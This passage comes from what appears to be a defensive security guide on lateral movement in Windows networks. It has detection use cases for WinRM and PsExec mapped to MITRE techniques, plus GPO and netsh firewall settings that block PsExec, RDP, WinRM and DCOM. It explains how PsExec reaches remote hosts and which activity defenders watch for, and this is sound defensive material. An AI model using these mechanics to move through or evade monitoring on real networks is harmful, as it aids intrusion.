style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unauthorized WinRM Execution Attempt</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.006 - Remote Services: Windows Remote Management</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for command execution attempts for WinRM on a system where WinRM has been disabled.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Suspicious Process Creation Using WinRM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.006 - Remote Services: Windows Remote Management</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for anomalous process creation events using WinRM that deviate from an established baseline.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Suspicious Network Connection Using WinRM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.006 - Remote Services: Windows Remote Management</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for network activity over known WinRM ports, such as TCP/5985 and TCP/5986, to identify anomalous connections that deviate from an established baseline.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Remote WMI Connection Using WinRM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.006 - Remote Services: Windows Remote Management</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for remote WMI connection attempts using WinRM. </span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 16: Detection opportunities for WinRM use</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Restricting Common Lateral Movement Tools and Methods</span></h4> <p><span style="vertical-align: baseline;">Table 17 provides a consolidated summary of security configurations that can be leveraged to combat against common remote access tools and methods used for lateral movement within environments.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: left;"><span style="vertical-align: baseline;">Tool/Tactic</span></p> </th> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: left;"><span style="vertical-align: baseline;">Mitigating Security Configurations (Target Endpoints)</span></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PsExec (using the current logged-on user account, without the </span><code style="vertical-align: baseline;">-u</code><span style="vertical-align: baseline;"> switch)</span></p> <p><span style="vertical-align: baseline;">If the </span><code style="vertical-align: baseline;">-u</code><span style="vertical-align: baseline;"> switch is not leveraged, authentication will use Kerberos or NTLM for the current logged-on user of the source endpoint and will register as a Type 3 (network) logon on the destination endpoint.</span></p> <p><span style="vertical-align: baseline;">PsExec high-level functionality:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Connects to the hidden </span><code style="vertical-align: baseline;">ADMIN$</code><span style="vertical-align: baseline;"> share (mapping to the </span><code style="vertical-align: baseline;">C:\Windows</code><span style="vertical-align: baseline;"> folder) on a remote endpoint via SMB (TCP/445).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Uses the Service Control Manager (SCM) to start the </span><code style="vertical-align: baseline;">PSExecsvc</code><span style="vertical-align: baseline;"> service and enable a named pipe on a remote endpoint.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Input/output redirection for the console is achieved via the created named pipe.</span></p> </li> </ul> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Option 1:</strong></p> <p><span style="vertical-align: baseline;">GPO configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Deny access to this computer from the network</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Deny access to this computer from the network</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Deny log on locally</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Deny log on through Terminal Services</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">DCOM:Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) Syntax</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Local Policies &gt; Security Options</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">DCOM:Machine Access Restrictions in Security Descriptor Definition Language (SDDL) Syntax</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Deny access to this computer from the network</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Option 2: </strong></p> <p><span style="vertical-align: baseline;">Windows Firewall rule:<br/><br/></span></p> <pre class="language-plain"><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 23: PowerShell command to disable inbound file and print sharing (SMB) for an endpoint using a local Windows Firewall rule</span></p> <p><strong style="vertical-align: baseline;">Option 3:</strong></p> <p><span style="vertical-align: baseline;">Disable administrative and hidden shares.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PsExec (with Alternative Credentials, via the </span><code style="vertical-align: baseline;">-u</code><span style="vertical-align: baseline;"> switch)</span></p> <p><span style="vertical-align: baseline;">If the </span><code style="vertical-align: baseline;">-u</code><span style="vertical-align: baseline;"> switch is leveraged, authentication will use the alternate supplied credentials and will register as a Type 3 (network) and Type 2 (interactive) logon on the destination endpoint.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Option 1:</strong></p> <p><span style="vertical-align: baseline;">GPO configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Option 2:</strong></p> <p><span style="vertical-align: baseline;">Windows Firewall rule:<br/><br/></span></p> <pre class="language-plain"><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 24: PowerShell command to disable inbound file and print sharing (SMB) for an endpoint using a local Windows Firewall rule</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Remote Desktop Protocol (RDP)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Option 1:</strong></p> <p><span style="vertical-align: baseline;">GPO configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Option 2:</strong></p> <p><span style="vertical-align: baseline;">Windows Firewall rule:<br/><br/></span></p> <pre class="language-plain"><code>netsh advfirewall firewall set rule group="Remote Desktop" new enable=no</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 25: PowerShell command to disable inbound Remote Desktop (RDP) for an endpoint using a local Windows Firewall rule</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PS remoting and WinRM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Option 1:</strong></p> <p><span style="vertical-align: baseline;">PowerShell command:<br/><br/></span></p> <pre class="language-plain"><code>Disable-PSRemoting -Force</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 26: PowerShell command to disable PowerShell remoting for an endpoint</span></p> <p><strong style="vertical-align: baseline;">Option 2:</strong></p> <p><span style="vertical-align: baseline;">GPO configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Windows Remote Management (WinRM) &gt; WinRM Service &gt; Allow remote server management through WinRM</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Option 3:</strong></p> <p><span style="vertical-align: baseline;">Windows Firewall rule:<br/><br/></span></p> <pre class="language-plain"><code>netsh advfirewall firewall set rule group="Windows Remote Management" new enable=no</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 27: PowerShell command to disable inbound WinRM for an endpoint using a local Windows Firewall rule</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Distributed Component Object Model (DCOM)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Option 1:</strong></p> <p><span style="vertical-align: baseline;">GPO configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Local Policies &gt; Security Options</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Both of these settings allow an organization to define additional computer-wide controls that govern access to all DCOM–based applications on an endpoint.</span></p> <p><span style="vertical-align: baseline;">When users or groups that are provided permissions are specified, the security descriptor field is populated with the SDDL representation of those groups and privileges.</span></p> <p><span style="vertical-align: baseline;">Users and groups can be given explicit </span><span style="font-style: italic; vertical-align: baseline;">Allow</span><span style="vertical-align: baseline;"> or </span><span style="font-style: italic; vertical-align: baseline;">Deny</span><span style="vertical-align: baseline;"> privileges for both local and remote access using DCOM.</span></p> <p><strong style="vertical-align: baseline;">Option 2:</strong></p> <p><span style="vertical-align: baseline;">Windows Firewall rules:<br/><br/></span></p> <pre class="language-plain"><code>netsh advfirewall firewall set rule group="COM+ Network Access" new enable=no netsh advfirewall firewall set rule group="COM+ Remote Administration" new enable=no</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 28: PowerShell commands to disable inbound DCOM for an endpoint using a local Windows Firewall rule</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Third-party remote access applications (e.g., VNC/DameWare/ScreenConnect) that rely upon specific interactive and remote logon permissions being configured on an endpoint.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GPO configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p> </li> </ul> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 17: Common lateral movement tools/methods and mitigating security controls</span></div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for Common Lateral Movement Tools and Methods</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Anomalous PsExec Usage</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1569/002/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1569.002 – System Services: Service Execution</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1021/002/" rel="noopener" 